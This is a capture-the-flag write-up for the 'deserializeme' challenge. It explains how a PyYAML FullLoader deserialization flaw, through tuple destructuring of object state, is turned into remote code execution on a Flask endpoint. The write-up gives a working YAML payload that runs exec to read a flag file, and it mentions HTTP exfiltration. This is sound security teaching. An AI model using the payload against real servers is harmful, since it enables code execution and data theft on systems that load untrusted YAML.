# deserializeme
In this challenge, we're linked a website as well as its Flask backend. It consists of a single route that loads a YAML file we provide in the request body:
```python
@app.route('/', methods=["POST"])
def pwnme():
if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE):
return "Nice try!", 400
return yaml.load(request.data)
```
Before anything else, I first verified that this worked as intended. My template for sending YAML files and receiving the result:
```python
import requests
r = requests.post('https://deserializeme.chal.uiuc.tf/', data=open('payload.yaml').read())
print(r.text) # {"hello":"world","number":9}
```
## Vulnerability
PyYAML is well-known for having unsafe deserialization, mainly because they support all sorts of interaction with Python. I'll reference their [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#yaml-tags-and-python-types) throughout the writeup.
However, there are two restrictions to keep in mind. First, `yaml.load` uses `FullLoader` by default, which bans the `!!python/object/apply` tag among other things. This means that we won't be able to call arbitrary functions like `eval`, although we can still construct class objects with the `!!python/object/new` tag.
Second, this challenge uses a regex filter, which bans the following characters:
* Periods
* Carets
* Underscores
* Backticks
This prevents us from accessing objects from other modules, which are specified with the `<module>.<name>` format. Fortunately, PyYAML will use the `builtins` module by default if you don't supply a period. I'm not sure if this is in the documentation, but the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L540) proves it:
```python
def find_python_name(self, name, mark, unsafe=False):
if not name:
raise ConstructorError("while constructing a Python object", mark,
"expected non-empty name appended to the tag", mark)
if '.' in name:
module_name, object_name = name.rsplit('.', 1)
else:
module_name = 'builtins'
object_name = name
```
To summarize, we can construct and reference built-in objects. However, we can't call functions, and our goal will be to execute code arbitrarily.
## Exploit
This is the format for specifying class construction, as per the [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#objects):
```yaml
!!python/object/new:module.Class
args: [argument, ...]
kwds: {key: value, ...}
state: ...
listitems: [item, ...]
dictitems: [key: value, ...]
```
Right away, I was interested in the `state` field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since they have read-only attributes. Fortunately, some classes are writeable: `Warning`, the `Error` types, etc. Hence the following creates an object where `obj.hello == 'world'`:
```yaml
!!python/object/new:Warning
state:
hello: 'world'
```
Not every attribute can be set, however. PyYAML calls `check_state_key` on each key value, which matches against a regex. Keys of the form `__something__` are banned, which makes some sense. Interestingly, the key `extend` is also banned. PyYAML justifies this in the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L483):
> `extend` is blacklisted because it is used by construct_python_object_apply to add `listitems` to a newly generate python instance
Let's look at the `construct_python_object_apply` method for clarification:
```python
if state:
self.set_python_instance_state(instance, state)
if listitems:
instance.extend(listitems)
if dictitems:
for key in dictitems:
instance[key] = dictitems[key]
return instance
```
Notice that if there were no blacklist, this payload would give RCE:
```yaml
!!python/object/new:Warning
state:
extend: !!python/name:exec
listitems: 'whatever python code we want'
```
We first set `extend` to be the built-in `exec` function, using the `!!python/name` tag. Now `instance.extend` is a static method, which PyYAML subsequently calls on `listitems` - a code string! We've essentially created an object that 'spoofs' a list.
In general, this bug exists whenever code assumes the type of an object we provide. It must then call a method with an argument that we control as well. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML - coincidentally the function which sets state. Here's the [source](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L595):
```python
def set_python_instance_state(self, instance, state, unsafe=False):
if hasattr(instance, '__setstate__'):
instance.__setstate__(state)
else:
slotstate = {}
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if hasattr(instance, '__dict__'):
if not unsafe and state:
for key in state.keys():
self.check_state_key(key)
instance.__dict__.update(state)
elif state:
slotstate.update(state)
for key, value in slotstate.items():
if not unsafe:
self.check_state_key(key)
setattr(instance, key, value)
```
Notice that `slotstate` is assumed to be a dictionary. Yet if `state` is a tuple, the code destructures it into `(state, slotstate)`. Since no other type checks are performed, we have full control over both objects! In particular, this lets us exploit `slotstate.update(state)`.
We want `slotstate` to be a dummy object where `update` points to `exec`. Hence `state` should be a tuple containing a code string and dummy object, in that order. One final caveat: in order to reach the `elif` block, our outer class instance cannot have the `__dict__` attribute - a read-only type like `str` works. Here's a payload which prints the flag:
```yaml
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec
```
A few more notes:
* Since periods are banned, I escaped it in the filename. Remember that it isn't YAML supporting hex escape sequences, but `exec`.
* In order to access object attributes and methods without periods, I used `getattr`.
* The easiest way to exfiltrate from the server is to make an HTTP request containing the flag. This is left as an exercise to the reader :smile: